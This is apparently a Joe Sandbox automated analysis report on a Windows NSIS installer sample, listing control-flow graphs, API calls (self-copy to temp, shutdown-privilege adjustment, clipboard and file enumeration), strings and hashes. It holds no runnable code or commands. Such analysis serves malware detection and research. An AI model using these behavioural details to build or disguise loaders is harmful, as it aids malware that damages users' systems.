45->32 53 403590-403594 45->53 46->45 52 403540-403548 46->52 48->49 49->24 57 4035b3 49->57 71 40383e-403844 50->71 72 40371e-40372e call 4058c8 ExitProcess 50->72 58 4036f7-4036fe call 4039cc 51->58 59 403668-403673 call 405b64 51->59 61 40354a-40354d 52->61 62 40354f 52->62 53->32 55 4035b5-4035c3 call 406183 53->55 54->35 54->50 64 4035c8 55->64 57->64 70 403703 58->70 75 4036c1-4036cb 59->75 76 403675-4036aa 59->76 61->45 61->62 62->45 64->25 70->50 73 4038c2-4038ca 71->73 74 403846-40385c GetCurrentProcess OpenProcessToken 71->74 81 4038d0-4038d4 ExitProcess 73->81 82 4038cc 73->82 78 403892-4038a0 call 406559 74->78 79 40385e-40388c LookupPrivilegeValueW AdjustTokenPrivileges 74->79 83 403734-403748 call 40584b lstrcatW 75->83 84 4036cd-4036db call 405c3f 75->84 80 4036ac-4036b0 76->80 98 4038a2-4038ac 78->98 99 4038ae-4038b9 ExitWindowsEx 78->99 79->78 89 4036b2-4036b7 80->89 90 4036b9-4036bd 80->90 82->81 96 403755-40376f lstrcatW lstrcmpiW 83->96 97 40374a-403750 lstrcatW 83->97 84->50 95 4036dd-4036f3 call 406183 * 2 84->95 89->90 94 4036bf 89->94 90->80 90->94 94->75 95->58 96->50 101 403771-403774 96->101 97->96 98->99 102 4038bb-4038bd call 40140b 98->102 99->73 99->102 104 403776-40377b call 4057b1 101->104 105 40377d call 40582e 101->105 102->73 113 403782-403790 SetCurrentDirectoryW 104->113 105->113 114 403792-403798 call 406183 113->114 115 40379d-4037c6 call 406183 113->115 114->115 119 4037cb-4037e7 call 4061a5 DeleteFileW 115->119 122 403828-403830 119->122 123 4037e9-4037f9 CopyFileW 119->123 122->119 125 403832-403839 call 406024 122->125 123->122 124 4037fb-40381b call 406024 call 4061a5 call 405863 123->124 124->122 134 40381d-403824 CloseHandle 124->134 125->50 134->122
                                                                                                                    APIs
                                                                                                                    • SetErrorMode.KERNELBASE ref: 004033D8
                                                                                                                    • GetVersion.KERNEL32 ref: 004033DE
                                                                                                                    • #17.COMCTL32(00000007,00000009,SETUPAPI,USERENV,UXTHEME), ref: 0040342E
                                                                                                                    • OleInitialize.OLE32(00000000), ref: 00403435
                                                                                                                    • SHGetFileInfoW.SHELL32(00421708,00000000,?,000002B4,00000000), ref: 00403451
                                                                                                                    • GetCommandLineW.KERNEL32(00429260,NSIS Error), ref: 00403466
                                                                                                                    • GetModuleHandleW.KERNEL32(00000000,"C:\Users\user\Desktop\RmIYOfX0yO.exe",00000000), ref: 00403479
                                                                                                                    • CharNextW.USER32(00000000,"C:\Users\user\Desktop\RmIYOfX0yO.exe",00000020), ref: 004034A0
                                                                                                                      • Part of subcall function 00406559: GetModuleHandleA.KERNEL32(?,?,00000020,00403422,00000009,SETUPAPI,USERENV,UXTHEME), ref: 0040656B
                                                                                                                      • Part of subcall function 00406559: GetProcAddress.KERNEL32(00000000,?), ref: 00406586
                                                                                                                    • GetTempPathW.KERNEL32(00000400,C:\Users\user\AppData\Local\Temp\), ref: 004035DB
                                                                                                                    • GetWindowsDirectoryW.KERNEL32(C:\Users\user\AppData\Local\Temp\,000003FB), ref: 004035EC
                                                                                                                    • lstrcatW.KERNEL32(C:\Users\user\AppData\Local\Temp\,\Temp), ref: 004035F8
                                                                                                                    • GetTempPathW.KERNEL32(000003FC,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,\Temp), ref: 0040360C
                                                                                                                    • lstrcatW.KERNEL32(C:\Users\user\AppData\Local\Temp\,Low), ref: 00403614
                                                                                                                    • SetEnvironmentVariableW.KERNEL32(TEMP,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,Low), ref: 00403625
                                                                                                                    • SetEnvironmentVariableW.KERNEL32(TMP,C:\Users\user\AppData\Local\Temp\), ref: 0040362D
                                                                                                                    • DeleteFileW.KERNELBASE(1033), ref: 00403641
                                                                                                                      • Part of subcall function 00406183: lstrcpynW.KERNEL32(0040A230,0040A230,00000400,00403466,00429260,NSIS Error), ref: 00406190
                                                                                                                    • OleUninitialize.OLE32(?), ref: 0040370C
                                                                                                                    • ExitProcess.KERNEL32 ref: 0040372E
                                                                                                                    • lstrcatW.KERNEL32(C:\Users\user\AppData\Local\Temp\,~nsu,"C:\Users\user\Desktop\RmIYOfX0yO.exe",00000000,?), ref: 00403741
                                                                                                                    • lstrcatW.KERNEL32(C:\Users\user\AppData\Local\Temp\,0040A328,C:\Users\user\AppData\Local\Temp\,~nsu,"C:\Users\user\Desktop\RmIYOfX0yO.exe",00000000,?), ref: 00403750
                                                                                                                    • lstrcatW.KERNEL32(C:\Users\user\AppData\Local\Temp\,.tmp,C:\Users\user\AppData\Local\Temp\,~nsu,"C:\Users\user\Desktop\RmIYOfX0yO.exe",00000000,?), ref: 0040375B
                                                                                                                    • lstrcmpiW.KERNEL32(C:\Users\user\AppData\Local\Temp\,C:\Users\user\Desktop,C:\Users\user\AppData\Local\Temp\,.tmp,C:\Users\user\AppData\Local\Temp\,~nsu,"C:\Users\user\Desktop\RmIYOfX0yO.exe",00000000,?), ref: 00403767
                                                                                                                    • SetCurrentDirectoryW.KERNEL32(C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\), ref: 00403783
                                                                                                                    • DeleteFileW.KERNEL32(00420F08,00420F08,?,0042B000,?), ref: 004037DD
                                                                                                                    • CopyFileW.KERNEL32(C:\Users\user\Desktop\RmIYOfX0yO.exe,00420F08,00000001), ref: 004037F1
                                                                                                                    • CloseHandle.KERNEL32(00000000,00420F08,00420F08,?,00420F08,00000000), ref: 0040381E
                                                                                                                    • GetCurrentProcess.KERNEL32(00000028,?), ref: 0040384D
                                                                                                                    • OpenProcessToken.ADVAPI32(00000000), ref: 00403854
                                                                                                                    • LookupPrivilegeValueW.ADVAPI32(00000000,SeShutdownPrivilege,?), ref: 00403869
                                                                                                                    • AdjustTokenPrivileges.ADVAPI32 ref: 0040388C
                                                                                                                    • ExitWindowsEx.USER32(00000002,80040002), ref: 004038B1
                                                                                                                    • ExitProcess.KERNEL32 ref: 004038D4
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.1357241082.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.1357219524.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1357259723.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1357335472.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1357335472.0000000000412000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1357335472.0000000000418000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1357335472.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1357335472.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1357335472.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1357335472.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1357335472.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1357335472.000000000044B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1357540340.000000000044F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_400000_RmIYOfX0yO.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: lstrcat$FileProcess$ExitHandle$CurrentDeleteDirectoryEnvironmentModulePathTempTokenVariableWindows$AddressAdjustCharCloseCommandCopyErrorInfoInitializeLineLookupModeNextOpenPrivilegePrivilegesProcUninitializeValueVersionlstrcmpilstrcpyn
                                                                                                                    • String ID: "C:\Users\user\Desktop\RmIYOfX0yO.exe"$.tmp$1033$C:\Users\user\AppData\Local\Temp\$C:\Users\user\AppData\Local\magmaet\clenched$C:\Users\user\AppData\Local\magmaet\clenched$C:\Users\user\Desktop$C:\Users\user\Desktop\RmIYOfX0yO.exe$Error launching installer$Error writing temporary file. Make sure your temp folder is valid.$Low$NSIS Error$SETUPAPI$SeShutdownPrivilege$TEMP$TMP$USERENV$UXTHEME$\Temp$~nsu
                                                                                                                    • API String ID: 3586999533-1761608603
                                                                                                                    • Opcode ID: f3ecbdcc9d2ddf88f0db60c94208847800fabd89ade3af92fca17dc4b9b4c2fd
                                                                                                                    • Instruction ID: 382b60f40ca78a79eaa77c6fd6579f97e3273799caf5780a05f3f86dc88dff68
                                                                                                                    • Opcode Fuzzy Hash: f3ecbdcc9d2ddf88f0db60c94208847800fabd89ade3af92fca17dc4b9b4c2fd
                                                                                                                    • Instruction Fuzzy Hash: 1DD11771200300BBD7207F659D09A2B3EADEB4070AF15843FF885B62D2DB7D9956876E

                                                                                                                    Control-flow Graph

                                                                                                                    • Executed
                                                                                                                    • Not Executed
                                                                                                                    control_flow_graph 135 405421-40543c 136 405442-405509 GetDlgItem * 3 call 40427c call 404b7f GetClientRect GetSystemMetrics SendMessageW * 2 135->136 137 4055cb-4055d2 135->137 158 405527-40552a 136->158 159 40550b-405525 SendMessageW * 2 136->159 139 4055d4-4055f6 GetDlgItem CreateThread CloseHandle 137->139 140 4055fc-405609 137->140 139->140 142 405627-405631 140->142 143 40560b-405611 140->143 147 405633-405639 142->147 148 405687-40568b 142->148 145 405613-405622 ShowWindow * 2 call 40427c 143->145 146 40564c-405655 call 4042ae 143->146 145->142 155 40565a-40565e 146->155 153 405661-405671 ShowWindow 147->153 154 40563b-405647 call 404220 147->154 148->146 151 40568d-405693 148->151 151->146 160 405695-4056a8 SendMessageW 151->160 156 405681-405682 call 404220 153->156 157 405673-40567c call 4052e2 153->157 154->146 156->148 157->156 164 40553a-405551 call 404247 158->164 165 40552c-405538 SendMessageW 158->165 159->158 166 4057aa-4057ac 160->166 167 4056ae-4056d9 CreatePopupMenu call 4061a5 AppendMenuW 160->167 174 405553-405567 ShowWindow 164->174 175 405587-4055a8 GetDlgItem SendMessageW 164->175 165->164 166->155 172 4056db-4056eb GetWindowRect 167->172 173 4056ee-405703 TrackPopupMenu 167->173 172->173 173->166 176 405709-405720 173->176 177 405576 174->177 178 405569-405574 ShowWindow 174->178 175->166 179 4055ae-4055c6 SendMessageW * 2 175->179 180 405725-405740 SendMessageW 176->180 181 40557c-405582 call 40427c 177->181 178->181 179->166 180->180 182 405742-405765 OpenClipboard EmptyClipboard GlobalAlloc GlobalLock 180->182 181->175 184 405767-40578e SendMessageW 182->184 184->184 185 405790-4057a4 GlobalUnlock SetClipboardData CloseClipboard 184->185 185->166
                                                                                                                    APIs
                                                                                                                    • GetDlgItem.USER32(?,00000403), ref: 0040547F
                                                                                                                    • GetDlgItem.USER32(?,000003EE), ref: 0040548E
                                                                                                                    • GetClientRect.USER32(?,?), ref: 004054CB
                                                                                                                    • GetSystemMetrics.USER32(00000002), ref: 004054D2
                                                                                                                    • SendMessageW.USER32(?,00001061,00000000,?), ref: 004054F3
                                                                                                                    • SendMessageW.USER32(?,00001036,00004000,00004000), ref: 00405504
                                                                                                                    • SendMessageW.USER32(?,00001001,00000000,00000110), ref: 00405517
                                                                                                                    • SendMessageW.USER32(?,00001026,00000000,00000110), ref: 00405525
                                                                                                                    • SendMessageW.USER32(?,00001024,00000000,?), ref: 00405538
                                                                                                                    • ShowWindow.USER32(00000000,?,0000001B,000000FF), ref: 0040555A
                                                                                                                    • ShowWindow.USER32(?,00000008), ref: 0040556E
                                                                                                                    • GetDlgItem.USER32(?,000003EC), ref: 0040558F
                                                                                                                    • SendMessageW.USER32(00000000,00000401,00000000,75300000), ref: 0040559F
                                                                                                                    • SendMessageW.USER32(00000000,00000409,00000000,?), ref: 004055B8
                                                                                                                    • SendMessageW.USER32(00000000,00002001,00000000,00000110), ref: 004055C4
                                                                                                                    • GetDlgItem.USER32(?,000003F8), ref: 0040549D
                                                                                                                      • Part of subcall function 0040427C: SendMessageW.USER32(00000028,?,00000001,004040A8), ref: 0040428A
                                                                                                                    • GetDlgItem.USER32(?,000003EC), ref: 004055E1
                                                                                                                    • CreateThread.KERNELBASE(00000000,00000000,Function_000053B5,00000000), ref: 004055EF
                                                                                                                    • CloseHandle.KERNELBASE(00000000), ref: 004055F6
                                                                                                                    • ShowWindow.USER32(00000000), ref: 0040561A
                                                                                                                    • ShowWindow.USER32(?,00000008), ref: 0040561F
                                                                                                                    • ShowWindow.USER32(00000008), ref: 00405669
                                                                                                                    • SendMessageW.USER32(?,00001004,00000000,00000000), ref: 0040569D
                                                                                                                    • CreatePopupMenu.USER32 ref: 004056AE
                                                                                                                    • AppendMenuW.USER32(00000000,00000000,00000001,00000000), ref: 004056C2
                                                                                                                    • GetWindowRect.USER32(?,?), ref: 004056E2
                                                                                                                    • TrackPopupMenu.USER32(00000000,00000180,?,?,00000000,?,00000000), ref: 004056FB
                                                                                                                    • SendMessageW.USER32(?,00001073,00000000,?), ref: 00405733
                                                                                                                    • OpenClipboard.USER32(00000000), ref: 00405743
                                                                                                                    • EmptyClipboard.USER32 ref: 00405749
                                                                                                                    • GlobalAlloc.KERNEL32(00000042,00000000), ref: 00405755
                                                                                                                    • GlobalLock.KERNEL32(00000000), ref: 0040575F
                                                                                                                    • SendMessageW.USER32(?,00001073,00000000,?), ref: 00405773
                                                                                                                    • GlobalUnlock.KERNEL32(00000000), ref: 00405793
                                                                                                                    • SetClipboardData.USER32(0000000D,00000000), ref: 0040579E
                                                                                                                    • CloseClipboard.USER32 ref: 004057A4
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.1357241082.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.1357219524.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1357259723.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1357335472.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1357335472.0000000000412000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1357335472.0000000000418000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1357335472.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1357335472.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1357335472.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1357335472.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1357335472.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1357335472.000000000044B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1357540340.000000000044F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_400000_RmIYOfX0yO.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: MessageSend$Window$ItemShow$Clipboard$GlobalMenu$CloseCreatePopupRect$AllocAppendClientDataEmptyHandleLockMetricsOpenSystemThreadTrackUnlock
                                                                                                                    • String ID: H7B${
                                                                                                                    • API String ID: 590372296-2256286769
                                                                                                                    • Opcode ID: 64a521bccca9f5caed772c9a5003e4b30c68140e3a7fe85c050ebaedb87b4aa9
                                                                                                                    • Instruction ID: 2c7cb92300b087b9ae130e103e133312d6144c84674811722de124f1f1f34f09
                                                                                                                    • Opcode Fuzzy Hash: 64a521bccca9f5caed772c9a5003e4b30c68140e3a7fe85c050ebaedb87b4aa9
                                                                                                                    • Instruction Fuzzy Hash: 16B13770900608FFDF119F60DD899AE7B79FB08354F40847AFA45A62A0CB758E52DF68

                                                                                                                    Control-flow Graph

                                                                                                                    • Executed
                                                                                                                    • Not Executed
                                                                                                                    control_flow_graph 434 4061a5-4061b0 435 4061b2-4061c1 434->435 436 4061c3-4061d9 434->436 435->436 437 4063f1-4063f7 436->437 438 4061df-4061ec 436->438 439 4063fd-406408 437->439 440 4061fe-40620b 437->440 438->437 441 4061f2-4061f9 438->441 442 406413-406414 439->442 443 40640a-40640e call 406183 439->443 440->439 444 406211-40621d 440->444 441->437 443->442 446 406223-40625f 444->446 447 4063de 444->447 448 406265-406270 GetVersion 446->448 449 40637f-406383 446->449 450 4063e0-4063ea 447->450 451 4063ec-4063ef 447->451 452 406272-406276 448->452 453 40628a 448->453 454 406385-406389 449->454 455 4063b8-4063bc 449->455 450->437 451->437 452->453 456 406278-40627c 452->456 459 406291-406298 453->459 457 406399-4063a6 call 406183 454->457 458 40638b-406397 call 4060ca 454->458 460 4063cb-4063dc lstrlenW 455->460 461 4063be-4063c6 call 4061a5 455->461 456->453 462 40627e-406282 456->462 472 4063ab-4063b4 457->472 458->472 464 40629a-40629c 459->464 465 40629d-40629f 459->465 460->437 461->460 462->453 468 406284-406288 462->468 464->465 470 4062a1-4062be call 406050 465->470 471 4062db-4062de 465->471 468->459 480 4062c3-4062c7 470->480 475 4062e0-4062ec GetSystemDirectoryW 471->475 476 4062ee-4062f1 471->476 472->460 474 4063b6 472->474 481 406377-40637d call 406417 474->481 477 406360-406364 475->477 478 4062f3-406301 GetWindowsDirectoryW 476->478 479 40635c-40635e 476->479 477->481 483 406366-40636a 477->483 478->479 479->477 482 406303-40630d 479->482 480->483 484 4062cd-4062d6 call 4061a5 480->484 481->460 487 406327-40633d SHGetSpecialFolderLocation 482->487 488 40630f-406312 482->488 483->481 490 40636c-406372 lstrcatW 483->490 484->477 492 406358 487->492 493 40633f-406356 SHGetPathFromIDListW CoTaskMemFree 487->493 488->487 491 406314-40631b 488->491 490->481 495 406323-406325 491->495 492->479 493->477 493->492 495->477 495->487
                                                                                                                    APIs
                                                                                                                    • GetVersion.KERNEL32(00000000,Completed,?,00405319,Completed,00000000,00000000,00000000), ref: 00406268
                                                                                                                    • GetSystemDirectoryW.KERNEL32(: Completed,00000400), ref: 004062E6
                                                                                                                    • GetWindowsDirectoryW.KERNEL32(: Completed,00000400), ref: 004062F9
                                                                                                                    • SHGetSpecialFolderLocation.SHELL32(?,?), ref: 00406335
                                                                                                                    • SHGetPathFromIDListW.SHELL32(?,: Completed), ref: 00406343
                                                                                                                    • CoTaskMemFree.OLE32(?), ref: 0040634E
                                                                                                                    • lstrcatW.KERNEL32(: Completed,\Microsoft\Internet Explorer\Quick Launch), ref: 00406372
                                                                                                                    • lstrlenW.KERNEL32(: Completed,00000000,Completed,?,00405319,Completed,00000000,00000000,00000000), ref: 004063CC
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.1357241082.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.1357219524.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1357259723.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1357335472.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1357335472.0000000000412000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1357335472.0000000000418000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1357335472.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1357335472.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1357335472.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1357335472.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1357335472.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1357335472.000000000044B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1357540340.000000000044F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_400000_RmIYOfX0yO.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: Directory$FolderFreeFromListLocationPathSpecialSystemTaskVersionWindowslstrcatlstrlen
                                                                                                                    • String ID: : Completed$Completed$Software\Microsoft\Windows\CurrentVersion$\Microsoft\Internet Explorer\Quick Launch
                                                                                                                    • API String ID: 900638850-905382516
                                                                                                                    • Opcode ID: bef7a9cb1f259f829c94a4570d8a9b9bb83f0db893824e0baf2e821e2216e9af
                                                                                                                    • Instruction ID: 0f73e779dd6c4db66e797802c36dad016b528f10de9f6072c808280cb7245e7c
                                                                                                                    • Opcode Fuzzy Hash: bef7a9cb1f259f829c94a4570d8a9b9bb83f0db893824e0baf2e821e2216e9af
                                                                                                                    • Instruction Fuzzy Hash: 9361F271A00105EBDB209F25CD41AAE37A5AF50314F16807FFD46BA2D0D73D89A2CB9D

                                                                                                                    Control-flow Graph

                                                                                                                    • Executed
                                                                                                                    • Not Executed
                                                                                                                    control_flow_graph 496 405974-40599a call 405c3f 499 4059b3-4059ba 496->499 500 40599c-4059ae DeleteFileW 496->500 502 4059bc-4059be 499->502 503 4059cd-4059dd call 406183 499->503 501 405b30-405b34 500->501 505 4059c4-4059c7 502->505 506 405ade-405ae3 502->506 509 4059ec-4059ed call 405b83 503->509 510 4059df-4059ea lstrcatW 503->510 505->503 505->506 506->501 508 405ae5-405ae8 506->508 511 405af2-405afa call 4064c6 508->511 512 405aea-405af0 508->512 513 4059f2-4059f6 509->513 510->513 511->501 520 405afc-405b10 call 405b37 call 40592c 511->520 512->501 516 405a02-405a08 lstrcatW 513->516 517 4059f8-405a00 513->517 519 405a0d-405a29 lstrlenW FindFirstFileW 516->519 517->516 517->519 521 405ad3-405ad7 519->521 522 405a2f-405a37 519->522 536 405b12-405b15 520->536 537 405b28-405b2b call 4052e2 520->537 521->506 524 405ad9 521->524 525 405a57-405a6b call 406183 522->525 526 405a39-405a41 522->526 524->506 538 405a82-405a8d call 40592c 525->538 539 405a6d-405a75 525->539 528 405a43-405a4b 526->528 529 405ab6-405ac6 FindNextFileW 526->529 528->525 534 405a4d-405a55 528->534 529->522 533 405acc-405acd FindClose 529->533 533->521 534->525 534->529 536->512 540 405b17-405b26 call 4052e2 call 406024 536->540 537->501 549 405aae-405ab1 call 4052e2 538->549 550 405a8f-405a92 538->550 539->529 541 405a77-405a80 call 405974 539->541 540->501 541->529 549->529 553 405a94-405aa4 call 4052e2 call 406024 550->553 554 405aa6-405aac 550->554 553->529 554->529
                                                                                                                    APIs
                                                                                                                    • DeleteFileW.KERNELBASE(?,?,756F3420,756F2EE0,"C:\Users\user\Desktop\RmIYOfX0yO.exe"), ref: 0040599D
                                                                                                                    • lstrcatW.KERNEL32(00425750,\*.*,00425750,?,?,756F3420,756F2EE0,"C:\Users\user\Desktop\RmIYOfX0yO.exe"), ref: 004059E5
                                                                                                                    • lstrcatW.KERNEL32(?,0040A014,?,00425750,?,?,756F3420,756F2EE0,"C:\Users\user\Desktop\RmIYOfX0yO.exe"), ref: 00405A08
                                                                                                                    • lstrlenW.KERNEL32(?,?,0040A014,?,00425750,?,?,756F3420,756F2EE0,"C:\Users\user\Desktop\RmIYOfX0yO.exe"), ref: 00405A0E
                                                                                                                    • FindFirstFileW.KERNEL32(00425750,?,?,?,0040A014,?,00425750,?,?,756F3420,756F2EE0,"C:\Users\user\Desktop\RmIYOfX0yO.exe"), ref: 00405A1E
                                                                                                                    • FindNextFileW.KERNEL32(00000000,00000010,000000F2,?,?,?,Error writing temporary file. Make sure your temp folder is valid.,0000002E), ref: 00405ABE
                                                                                                                    • FindClose.KERNEL32(00000000), ref: 00405ACD
                                                                                                                    Strings
                                                                                                                    • PWB, xrefs: 004059CD
                                                                                                                    • "C:\Users\user\Desktop\RmIYOfX0yO.exe", xrefs: 0040597D
                                                                                                                    • \*.*, xrefs: 004059DF
                                                                                                                    • Error writing temporary file. Make sure your temp folder is valid., xrefs: 00405A5E
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.1357241082.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.1357219524.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1357259723.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1357335472.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1357335472.0000000000412000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1357335472.0000000000418000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1357335472.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1357335472.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1357335472.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1357335472.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1357335472.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1357335472.000000000044B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1357540340.000000000044F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_400000_RmIYOfX0yO.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: FileFind$lstrcat$CloseDeleteFirstNextlstrlen
                                                                                                                    • String ID: "C:\Users\user\Desktop\RmIYOfX0yO.exe"$Error writing temporary file. Make sure your temp folder is valid.$PWB$\*.*
                                                                                                                    • API String ID: 2035342205-629741633
                                                                                                                    • Opcode ID: 03fd1591811734580f28d43f6b2dd8bf165791cda161b7166c14a59216ccda8d
                                                                                                                    • Instruction ID: d49c34b76256c1d29f4337415f4183e275b3e80d30968624801757685f99445f
                                                                                                                    • Opcode Fuzzy Hash: 03fd1591811734580f28d43f6b2dd8bf165791cda161b7166c14a59216ccda8d
                                                                                                                    • Instruction Fuzzy Hash: E041B130A00A14EADB21AB618D89BAF7778DF41764F20427FF805B51D2D77C5982CE6E
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.1357241082.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.1357219524.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1357259723.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1357335472.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1357335472.0000000000412000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1357335472.0000000000418000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1357335472.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1357335472.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1357335472.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1357335472.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1357335472.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1357335472.000000000044B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1357540340.000000000044F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_400000_RmIYOfX0yO.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID:
                                                                                                                    • API String ID:
                                                                                                                    • Opcode ID: 673f315f3887413ad686258b59d5e48c26cbda3fe4b4ae472fabdc6907277f98
                                                                                                                    • Instruction ID: 5555e847f210990d4306c473702a26b4278c0affe79ec1256b97cb42bd71170f
                                                                                                                    • Opcode Fuzzy Hash: 673f315f3887413ad686258b59d5e48c26cbda3fe4b4ae472fabdc6907277f98
